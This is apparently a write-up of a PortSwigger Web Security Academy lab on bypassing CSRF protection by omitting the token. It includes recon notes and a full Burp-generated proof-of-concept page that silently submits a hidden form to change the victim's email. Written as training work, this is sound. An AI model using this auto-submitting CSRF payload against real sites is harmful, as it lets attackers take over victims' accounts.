Lab: CSRF where token validation depends on token being present

Posted on | Post modified | In |

Lab: CSRF where token validation depends on token being present

tags: Portswigger Web Security Academy Web
  • Description: This lab’s email change functionality is vulnerable to CSRF.
  • Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You can log in to your own account using the following credentials: wiener:peter

Recon

  1. Login and update email to trace the package It’s very similar with previous lab $\to$ it contained CSRF_token as its carried data:

  2. Try to use 1st method to bypass It seems can work properly.

Exp - Delete CSRF_token directly to bypass

Actually, this is totally the same with the first lab’s payload Exploit Payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>

    <form action="https://0aa70059042bf55d80101c7a00930051.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
    </form>
    <script>
          document.forms[0].submit();
    </script>
  </body>
</html>

:::spoiler Success Screenshot :::

Reference

Lab: CSRF where token validation depends on token being present:CSRF 从0到1完全掌握 CSRF